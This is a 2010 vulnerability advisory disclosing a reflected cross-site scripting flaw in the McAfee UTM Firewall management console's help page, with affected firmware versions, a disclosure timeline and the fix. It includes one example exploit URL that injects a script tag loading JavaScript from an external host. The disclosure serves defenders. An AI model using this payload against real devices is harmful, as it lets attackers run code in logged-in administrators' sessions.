Advisory Information Advisory ID: NGENUITY-2010-005 Date published: 6/9/2010 Vulnerability Information Class: Reflected Cross-Site Scripting (XSS) Software Description McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the affected product line. More information can be found at https://kc.mcafee.com/corporate/index?page=content&id=SB10010 <http://www.mcafee.com/us/enterprise/products/network_security/utm_firew all.html> Vulnerability Description The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting. It could allow an attacker to cause a user to execute attacker-supplied Javascript code. This attack requires the target to have an existing valid session logged into the UTM device and that the attacker know the internal IP address for the UTM device. McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability *Timeline: * 1/21/2010 - McAfee notified of vulnerability, provided with proof of concept 6/9/2010 - McAfee notified nGenuity of available fix and related information Technical Description *Example Exploit URL: * hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block?><script src=?http://example.com/xss.js?></script> Original Posting: http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cr oss-site-scripting/